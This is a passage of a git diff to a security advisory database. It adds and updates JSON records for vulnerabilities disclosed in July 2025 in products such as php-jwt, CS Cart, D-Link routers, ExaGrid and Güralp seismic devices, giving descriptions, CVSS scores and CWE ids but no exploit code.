a/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json b/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json new file mode 100644 index 0000000000000..9f2d0a3d1768a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x45-7fc3-mxwq", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-45769" + ], + "details": "php-jwt v6.11.0 was discovered to contain weak encryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45769" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ZupeiNie/83756316c4c24fe97a50176a92608db3" + }, + { + "type": "WEB", + "url": "https://github.com/firebase" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json b/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json index ea309edf11a2b..a751f60b969c2 100644 --- a/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json +++ b/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-32gv-r223-hpr7", - "modified": "2025-07-31T18:32:03Z", + "modified": "2025-07-31T21:31:52Z", "published": "2025-07-31T18:32:03Z", "aliases": [ "CVE-2025-50848" ], "details": "A file upload vulnerability was discovered in CS Cart 4.18.3, allows attackers to execute arbitrary code. CS Cart 4.18.3 allows unrestricted upload of HTML files, which are rendered directly in the browser when accessed. This allows an attacker to upload a crafted HTML file containing malicious content, such as a fake login form for credential harvesting or scripts for Cross-Site Scripting (XSS) attacks. Since the content is served from a trusted domain, it significantly increases the likelihood of successful phishing or script execution against other users.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T16:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-5qv2-823h-cg9j/GHSA-5qv2-823h-cg9j.json b/advisories/unreviewed/2025/07/GHSA-5qv2-823h-cg9j/GHSA-5qv2-823h-cg9j.json new file mode 100644 index 0000000000000..addc45e16e1db --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5qv2-823h-cg9j/GHSA-5qv2-823h-cg9j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qv2-823h-cg9j", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-8286" + ], + "details": "Güralp FMUS series seismic monitoring devices expose an unauthenticated Telnet-based command line interface that \ncould allow an attacker to modify hardware configurations, manipulate \ndata, or factory reset the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8286" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json b/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json index 884c4e0d9d9b9..7818364774ff2 100644 --- a/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json +++ b/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6fpv-q3vm-j4gh", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-51383" ], "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the ipsec_road_asp function via the host_ip parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T18:15:41Z" diff --git a/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json b/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json index 193633392d5fd..6c09bf781ebd1 100644 --- a/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json +++ b/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6vjc-2rp5-c2hr", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T21:31:50Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-29557" ], "details": "ExaGrid EX10 6.3 - 7.0.1.P08 is vulnerable to Incorrect Access Control in the MailConfiguration API endpoint, where users with operator-level privileges can issue an HTTP request to retrieve SMTP credentials, including plaintext passwords.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json b/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json index 8e169d398374b..993fcedb12ba0 100644 --- a/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json +++ b/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-75pq-m89c-9h5r", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-50866" ], "details": "CloudClassroom-PHP-Project 1.0 contains a reflected Cross-site Scripting (XSS) vulnerability in the email parameter of the postquerypublic endpoint. Improper sanitization allows an attacker to inject arbitrary JavaScript code that executes in the context of the user s browser, potentially leading to session hijacking or phishing attacks.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T17:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json b/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json index c490bdf5d9afc..ae165c328083f 100644 --- a/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json +++ b/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-782f-gxj5-xvqc", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-51503" ], "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Microweber CMS 2.0 allows attackers to inject malicious scripts into user profile fields, leading to arbitrary JavaScript execution in admin browsers.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T18:15:42Z" diff --git a/advisories/unreviewed/2025/07/GHSA-7hhp-cmgc-52fj/GHSA-7hhp-cmgc-52fj.json b/advisories/unreviewed/2025/07/GHSA-7hhp-cmgc-52fj/GHSA-7hhp-cmgc-52fj.json new file mode 100644 index 0000000000000..4f6024651a168 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7hhp-cmgc-52fj/GHSA-7hhp-cmgc-52fj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hhp-cmgc-52fj", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-23289" + ], + "details": "NVIDIA Omniverse Launcher for Windows and Linux contains a vulnerability in the launcher logs, where a user could cause sensitive information to be written to the log files through proxy servers. A successful exploit of this vulnerability might lead to information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23289" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7rf9-h4hc-6359/GHSA-7rf9-h4hc-6359.json b/advisories/unreviewed/2025/07/GHSA-7rf9-h4hc-6359/GHSA-7rf9-h4hc-6359.json new file mode 100644 index 0000000000000..524b52836582e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7rf9-h4hc-6359/GHSA-7rf9-h4hc-6359.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rf9-h4hc-6359", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2023-32251" + ], + "details": "A vulnerability has been identified in the Linux kernel's ksmbd component (kernel SMB/CIFS server). A security control designed to prevent dictionary attacks, which introduces a 5-second delay during session setup, can be bypassed through the use of asynchronous requests. This bypass negates the intended anti-brute-force protection, potentially allowing attackers to conduct dictionary attacks more efficiently against user credentials or other authentication mechanisms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32251" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-32251" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2385852" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b096d97f47326b1e2dbdef1c91fab69ffda54d17" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-699" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8xpj-x7cg-qg43/GHSA-8xpj-x7cg-qg43.json b/advisories/unreviewed/2025/07/GHSA-8xpj-x7cg-qg43/GHSA-8xpj-x7cg-qg43.json new file mode 100644 index 0000000000000..db2309def6e73 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8xpj-x7cg-qg43/GHSA-8xpj-x7cg-qg43.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xpj-x7cg-qg43", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-26063" + ], + "details": "An issue in Intelbras RX1500 v2.2.9 and RX3000 v1.0.11 allows unauthenticated attackers to execute arbitrary code via injecting a crafted payload into the ESSID name when creating a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26063" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX1500.html" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX3000.html" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2025/Jul/14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json b/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json index d1aaaadd9cd1c..74944009a8751 100644 --- a/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json +++ b/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c2ff-5p35-6q77", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-51384" ], "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the ipsec_net_asp function via the remot_ip parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T18:15:41Z" diff --git a/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json b/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json index 0fd290764951d..f24fa57986996 100644 --- a/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json +++ b/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cmjc-2g23-9m8c", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T21:31:50Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-50270" ], "details": "A stored Cross Site Scripting (xss) vulnerability in the \"content management\" feature in AnQiCMS v.3.4.11 allows a remote attacker to execute arbitrary code via a crafted script to the title, categoryTitle, and tmpTag parameters.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json b/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json index 55d3b1d8e60a9..83dc69191d226 100644 --- a/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json +++ b/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-gh4w-3jmf", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:52Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-50850" ], "details": "An issue was discovered in CS Cart 4.18.3 allows the vendor login functionality lacks essential security controls such as CAPTCHA verification and rate limiting. This allows an attacker to systematically attempt various combinations of usernames and passwords (brute-force attack) to gain unauthorized access to vendor accounts. The absence of any blocking mechanism makes the login endpoint susceptible to automated attacks.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T16:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json b/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json index 381977be36383..d56d6696b4b45 100644 --- a/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json +++ b/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gcm8-8cp3-3x4h", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T21:31:50Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-51569" ], "details": "A cross-site scripting (XSS) vulnerability exists in the LB-Link BL-CPE300M 01.01.02P42U14_06 router's web interface. The /goform/goform_get_cmd_process endpoint fails to sanitize user input in the cmd parameter before reflecting it into a text/html response. This allows unauthenticated attackers to inject arbitrary JavaScript, which is executed in the context of the router's origin when the crafted URL is accessed. The issue requires user interaction to exploit.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:37Z" diff --git a/advisories/unreviewed/2025/07/GHSA-hp45-3w87-63c3/GHSA-hp45-3w87-63c3.json b/advisories/unreviewed/2025/07/GHSA-hp45-3w87-63c3/GHSA-hp45-3w87-63c3.json new file mode 100644 index 0000000000000..a0f0fa03a1fbf --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hp45-3w87-63c3/GHSA-hp45-3w87-63c3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hp45-3w87-63c3", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-45770" + ], + "details": "jwt v5.4.3 was discovered to contain weak encryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45770" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ZupeiNie/cd88c827eef11a1618f8baacccd240fb" + }, + { + "type": "WEB", + "url": "https://github.com/lcobucci" + }, + { + "type": "WEB", + "url": "https://github.com/lcobucci/jwt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json b/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json index 904278c7ead18..4fcec13cfddf8 100644 --- a/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json +++ b/advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hq48-r775-f9j2", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:52Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-50867" ], "details": "A SQL Injection vulnerability exists in the takeassessment2.php endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST parameter is directly embedded in SQL statements without sanitization.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T16:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-j3vg-9hrg-5754/GHSA-j3vg-9hrg-5754.json b/advisories/unreviewed/2025/07/GHSA-j3vg-9hrg-5754/GHSA-j3vg-9hrg-5754.json new file mode 100644 index 0000000000000..ef723620b6d78 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j3vg-9hrg-5754/GHSA-j3vg-9hrg-5754.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3vg-9hrg-5754", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-37109" + ], + "details": "Cross-site scripting vulnerability has been identified in HPE Telco Service Activator product", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37109" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04887en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json b/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json index c25e8113b8d1e..35ca862a1fa8e 100644 --- a/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json +++ b/advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j927-gjfr-7859", - "modified": "2025-07-31T18:32:03Z", + "modified": "2025-07-31T21:31:51Z", "published": "2025-07-31T18:32:03Z", "aliases": [ "CVE-2025-50847" ], "details": "Cross Site Request Forgery (CSRF) vulnerability in CS Cart 4.18.3, allows attackers to add products to a user's comparison list via a crafted HTTP request.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T16:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pv6m-hmr7-w8g8/GHSA-pv6m-hmr7-w8g8.json b/advisories/unreviewed/2025/07/GHSA-pv6m-hmr7-w8g8/GHSA-pv6m-hmr7-w8g8.json new file mode 100644 index 0000000000000..9b942c305076b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pv6m-hmr7-w8g8/GHSA-pv6m-hmr7-w8g8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv6m-hmr7-w8g8", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-37108" + ], + "details": "Cross-site scripting vulnerability has been identified in HPE Telco Service Activator product", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37108" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04887en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json b/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json index 1d4fe142dff88..2c605612025eb 100644 --- a/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json +++ b/advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q4xj-79jm-5gwm", - "modified": "2025-07-31T18:32:03Z", + "modified": "2025-07-31T21:31:51Z", "published": "2025-07-31T18:32:03Z", "aliases": [ "CVE-2025-29556" ], "details": "ExaGrid EX10 6.3 - 7.0.1.P08 is vulnerable to Incorrect Access Control. Since version 6.3, ExaGrid enforces restrictions preventing users with the Admin role from creating or modifying users with the Security Officer role without approval. However, a flaw in the account creation process allows an attacker to bypass these restrictions via API request manipulation. An attacker with an Admin access can intercept and modify the API request during user creation, altering the parameters to assign the new account to the ExaGrid Security Officers group without the required approval.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T16:15:29Z" diff --git a/advisories/unreviewed/2025/07/GHSA-r8fm-999q-9fw9/GHSA-r8fm-999q-9fw9.json b/advisories/unreviewed/2025/07/GHSA-r8fm-999q-9fw9/GHSA-r8fm-999q-9fw9.json new file mode 100644 index 0000000000000..d51df3f7b3fcb --- /dev/null +++ 